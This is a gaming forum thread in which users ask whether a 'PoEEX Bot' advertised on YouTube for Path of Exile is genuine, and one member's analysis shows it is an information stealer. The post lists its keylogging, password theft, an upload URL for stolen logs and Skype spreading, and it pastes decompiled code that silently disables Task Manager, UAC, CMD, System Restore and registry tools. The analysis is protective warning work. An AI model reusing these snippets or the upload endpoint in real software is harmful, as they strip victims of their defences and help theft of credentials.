Bot?

[username1001011]

Hi there

I stumbled accross this: https://www.youtube.com/watch?v=SYz2C_wxwVI

Is this legit? Malware?

I wonder if anyone has tried it.

[Augury13]

"Ratings have been disabled for this video." so Most likely a scam/malware.

[username1001011]

"Ratings have been disabled for this video." so Most likely a scam/malware.

good point

[ferrokarr]

hmmm "they" have some other interesting hacks too.....( PoEEX )
i will do a sep. vm and check at weekend

[SKU]

It's a keylogger, information stealer, and much more. Do not execute.

Virustotal from the embedded dll: https://www.virustotal.com/en/file/d...is/1369861137/

[username1001011]

Virustotal from the embedded dll: https://www.virustotal.com/en/file/d...is/1369861137/

Well, according to this blog entry, VT isn't all that good - Sarvam Blog: Nearly 70% of Packed Windows System files are labeled as Malware

Still, if you use a blank external drive with nothing but Win2Go on it and PoE with a new bot account... would it steal the PoE info stuff....

[SKU]

Well, according to this blog entry, VT isn't all that good - Sarvam Blog: Nearly 70% of Packed Windows System files are labeled as Malware

Still, if you use a blank external drive with nothing but Win2Go on it and PoE with a new bot account... would it steal the PoE info stuff....

Did you even read the article? What do packed system files have to do with this?

When I say it's a keylogger etc., I'm not making an assumption based on the VT output. I looked at the code and saw it.

Here is a very inconclusive list of nasty stuff this program does:
- Keylogger using a keyboard hook, in PoEEX Bot::KeyHook::Hook(): KeyHook.KHK = KeyHook.SetWindowsHookEx(WH_KEYBOARD_LL, KeyHook.KHD, (int)value, 0);
- Uploads logs to hxxp://www.limitlessproducts.org/Limitless/Login/submit_log.php as user=wedge92 in PoEXX Bot::mainFunctions::dispatchConfirmation()
- Takes screenshots of your computer and E-Mails them, PoEXX Bot::mainFunctions::Email()
- Forces you to login to your Steam account
- Forces you to login to Skype, sends Skype messages
- Visit websites
- Downloads and executes further stuff, possibly on command, didn't check
- Gets your Firefox, Chrome, Filezilla, Spotify, MSN, Pidgin, SmartFTP, DynDNS, CoreFTP, ... passwords if they are saved on your computer (recovery settings etc)
- Spreads itself over Skype
- Uses the ClassLibrary1 module (the embedded DLL) to do a lot more nasty stuff like disabling your TaskMgr, CMD, etc:

Code:

// ClassLibrary1.Functions.Other.Disables
public static void ControlPanel()
{
	try
	{
		Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f", AppWinStyle.Hide, false, -1);
	}
	catch (Exception arg_12_0)
	{
		ProjectData.SetProjectError(arg_12_0);
		ProjectData.ClearProjectError();
	}
}

// ClassLibrary1.Functions.Other.Disables
public static void FolderOptions()
{
	try
	{
		Interaction.Shell("REG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f", AppWinStyle.Hide, false, -1);
	}
	catch (Exception arg_12_0)
	{
		ProjectData.SetProjectError(arg_12_0);
		ProjectData.ClearProjectError();
	}
}

// ClassLibrary1.Functions.Other.Disables
public static void Registry()
{
	try
	{
		MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableRegistryTools", "1", RegistryValueKind.DWord);
	}
	catch (Exception arg_24_0)
	{
		ProjectData.SetProjectError(arg_24_0);
		ProjectData.ClearProjectError();
	}
}

// ClassLibrary1.Functions.Other.Disables
public static void SystemRestore()
{
	try
	{
		MyProject.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore", "DisableSR", "1", RegistryValueKind.DWord);
	}
	catch (Exception arg_24_0)
	{
		ProjectData.SetProjectError(arg_24_0);
		ProjectData.ClearProjectError();
	}
}

// ClassLibrary1.Functions.Other.Disables
public static void TaskManager()
{
	try
	{
		MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableTaskMgr", "1", RegistryValueKind.DWord);
	}
	catch (Exception arg_24_0)
	{
		ProjectData.SetProjectError(arg_24_0);
		ProjectData.ClearProjectError();
	}
}

// ClassLibrary1.Functions.Other.Disables
public static void Uac()
{
	try
	{
		Interaction.Shell("C:\\Windows\\System32\\cmd.exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", AppWinStyle.Hide, false, -1);
	}
	catch (Exception arg_12_0)
	{
		ProjectData.SetProjectError(arg_12_0);
		ProjectData.ClearProjectError();
	}
}

// ClassLibrary1.Functions.Other.Disables
public static void Cmd()
{
	try
	{
		MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System", "DisableCMD", "1", RegistryValueKind.DWord);
	}
	catch (Exception arg_24_0)
	{
		ProjectData.SetProjectError(arg_24_0);
		ProjectData.ClearProjectError();
	}
}

I find it great that people don't blindly believe stuff, but really? It's not that hard to look at it yourself, and linking articles that you either didn't read or/nor understand does not help anyone.

[username1001011]

I looked at the code and saw it.

Well, there was no mentioning of it before Thx for your work. Still I wonder if it works or not... and if it does, if all that crap/spy/malware could be removed.

[SKU]

Well, there was no mentioning of it before Thx for your work. Still I wonder if it works or not... and if it does, if all that crap/spy/malware could be removed.

If you remove all that crap/spy/malware, you have nothing left. There is no PoE bot inside that executable - it has absolutely nothing to do with PoE; it's just malware.

Rule of thumb: YouTube video advertising a fancy hack-related program (bot, money-hack, gm-hack, speed-hack, ..)? It's malware.

[username1001011]

Rule of thumb: YouTube video advertising a fancy hack-related program (bot, money-hack, gm-hack, speed-hack, ..)? It's malware.

You might have a good point there there... too bad really

[corererr]

Is there any bot outside? :-)

[username1001011]

Here someone complains about lots of bots:

Forum - General Discussion - Holy shoot!!Lots of bots are farming orbs and mirrors!!!!!anyone stop them??? - Path of Exile

but couldn't really find one yet....

[corererr]

any news of the bots? i dont find one

[username1001011]

any news of the bots? i dont find one

Have a look here: http://www.ownedcore.com/forums/mmo/...pha-v0-3a.html